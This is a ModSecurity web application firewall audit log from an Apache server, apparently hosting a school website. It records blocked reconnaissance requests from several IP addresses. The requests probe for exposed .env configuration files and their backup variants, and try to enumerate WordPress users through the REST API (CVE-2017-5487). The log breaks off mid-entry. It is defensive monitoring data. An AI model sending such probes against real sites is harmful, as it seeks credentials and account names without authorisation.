Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2871639-Z-- --26cbe109-A-- [30/May/2025:06:19:11 +0700] aDjrb7W504ObxUT6Rrzw1AAAAAE 103.236.140.4 47746 103.236.140.4 8181 --26cbe109-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 31.56.56.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --26cbe109-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26cbe109-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748560751140202 801 (- - -) Stopwatch2: 1748560751140202 801; combined=312, p1=274, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26cbe109-Z-- --2679e05e-A-- [30/May/2025:07:07:19 +0700] aDj2t7W504ObxUT6Rrzy4QAAAAk 103.236.140.4 52382 103.236.140.4 8181 --2679e05e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.4.126.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.4.126.1 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2679e05e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2679e05e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748563639361334 3157 (- - -) Stopwatch2: 1748563639361334 3157; combined=1384, p1=478, p2=877, p3=0, p4=0, p5=29, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2679e05e-Z-- --3cca6937-A-- [30/May/2025:08:20:46 +0700] aDkH7oWl_OZMPH_FZ2DLXAAAAMo 103.236.140.4 53614 103.236.140.4 8181 --3cca6937-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 138.122.164.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 138.122.164.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3cca6937-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3cca6937-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748568046227703 3665 (- - -) Stopwatch2: 1748568046227703 3665; combined=1612, p1=567, p2=1014, p3=0, p4=0, p5=31, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3cca6937-Z-- --0fbfed1d-A-- [30/May/2025:08:50:47 +0700] aDkO97W504ObxUT6RrzzygAAAAM 103.236.140.4 54128 103.236.140.4 8181 --0fbfed1d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 187.109.123.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 187.109.123.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0fbfed1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fbfed1d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748569847537946 2803 (- - -) Stopwatch2: 1748569847537946 2803; combined=1259, p1=442, p2=787, p3=0, p4=0, p5=30, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fbfed1d-Z-- --dfacca0d-A-- [30/May/2025:09:34:30 +0700] aDkZNrW504ObxUT6Rrz0pwAAABc 103.236.140.4 55656 103.236.140.4 8181 --dfacca0d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 159.65.131.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.65.131.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dfacca0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfacca0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748572470325546 3252 (- - -) Stopwatch2: 1748572470325546 3252; combined=1424, p1=484, p2=908, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfacca0d-Z-- --8abf495d-A-- [30/May/2025:09:56:05 +0700] aDkeRbW504ObxUT6Rrz0wwAAABY 103.236.140.4 55856 103.236.140.4 8181 --8abf495d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --8abf495d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8abf495d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573765240478 756 (- - -) Stopwatch2: 1748573765240478 756; combined=310, p1=273, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8abf495d-Z-- --54d0700d-A-- [30/May/2025:09:56:05 +0700] aDkeRbW504ObxUT6Rrz0xAAAABg 103.236.140.4 55858 103.236.140.4 8181 --54d0700d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --54d0700d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54d0700d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573765481256 771 (- - -) Stopwatch2: 1748573765481256 771; combined=334, p1=298, p2=0, p3=0, p4=0, p5=36, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54d0700d-Z-- --8f906116-A-- [30/May/2025:09:56:05 +0700] aDkeRbW504ObxUT6Rrz0xQAAAAM 103.236.140.4 55860 103.236.140.4 8181 --8f906116-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --8f906116-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f906116-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573765823759 719 (- - -) Stopwatch2: 1748573765823759 719; combined=257, p1=224, p2=0, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f906116-Z-- --99cc9a72-A-- [30/May/2025:09:56:06 +0700] aDkeRhNBDSvkc-tIZOnfRwAAAEk 103.236.140.4 55862 103.236.140.4 8181 --99cc9a72-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --99cc9a72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99cc9a72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573766064454 638 (- - -) Stopwatch2: 1748573766064454 638; combined=253, p1=222, p2=0, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99cc9a72-Z-- --691cc972-A-- [30/May/2025:09:56:06 +0700] aDkeRhNBDSvkc-tIZOnfSAAAAE0 103.236.140.4 55864 103.236.140.4 8181 --691cc972-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --691cc972-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --691cc972-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573766406768 620 (- - -) Stopwatch2: 1748573766406768 620; combined=249, p1=216, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --691cc972-Z-- --daa8542f-A-- [30/May/2025:09:56:06 +0700] aDkeRhNBDSvkc-tIZOnfSQAAAFg 103.236.140.4 55866 103.236.140.4 8181 --daa8542f-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --daa8542f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --daa8542f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573766647268 659 (- - -) Stopwatch2: 1748573766647268 659; combined=255, p1=222, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daa8542f-Z-- --e88ab73a-A-- [30/May/2025:09:56:06 +0700] aDkeRpxu2QkuXt3B9jaSFwAAAJY 103.236.140.4 55868 103.236.140.4 8181 --e88ab73a-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --e88ab73a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e88ab73a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573766989528 670 (- - -) Stopwatch2: 1748573766989528 670; combined=260, p1=226, p2=0, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e88ab73a-Z-- --b5da7333-A-- [30/May/2025:09:56:07 +0700] aDkeRxNBDSvkc-tIZOnfSgAAAE8 103.236.140.4 55870 103.236.140.4 8181 --b5da7333-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --b5da7333-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5da7333-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573767230286 684 (- - -) Stopwatch2: 1748573767230286 684; combined=281, p1=249, p2=0, p3=0, p4=0, p5=32, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5da7333-Z-- --7f70dc14-A-- [30/May/2025:09:56:07 +0700] aDkeRxNBDSvkc-tIZOnfSwAAAE4 103.236.140.4 55872 103.236.140.4 8181 --7f70dc14-B-- GET /.env.development.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --7f70dc14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f70dc14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573767572156 677 (- - -) Stopwatch2: 1748573767572156 677; combined=297, p1=266, p2=0, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f70dc14-Z-- --bf4d9421-A-- [30/May/2025:09:56:07 +0700] aDkeR5xu2QkuXt3B9jaSGAAAAJg 103.236.140.4 55874 103.236.140.4 8181 --bf4d9421-B-- GET /.env.development.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --bf4d9421-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf4d9421-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573767812938 680 (- - -) Stopwatch2: 1748573767812938 680; combined=259, p1=226, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf4d9421-Z-- --12886e76-A-- [30/May/2025:09:56:08 +0700] aDkeSBNBDSvkc-tIZOnfTAAAAFE 103.236.140.4 55876 103.236.140.4 8181 --12886e76-B-- GET /.env.prod.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --12886e76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12886e76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573768154202 648 (- - -) Stopwatch2: 1748573768154202 648; combined=266, p1=235, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12886e76-Z-- --a4bd0409-A-- [30/May/2025:09:56:08 +0700] aDkeSBNBDSvkc-tIZOnfTQAAAFA 103.236.140.4 55878 103.236.140.4 8181 --a4bd0409-B-- GET /.env.prod.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --a4bd0409-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4bd0409-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573768394808 674 (- - -) Stopwatch2: 1748573768394808 674; combined=275, p1=243, p2=0, p3=0, p4=0, p5=31, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4bd0409-Z-- --edcdaa61-A-- [30/May/2025:09:56:08 +0700] aDkeSIWl_OZMPH_FZ2DMXQAAAM0 103.236.140.4 55880 103.236.140.4 8181 --edcdaa61-B-- GET /.env.production.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --edcdaa61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --edcdaa61-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573768736404 664 (- - -) Stopwatch2: 1748573768736404 664; combined=256, p1=223, p2=0, 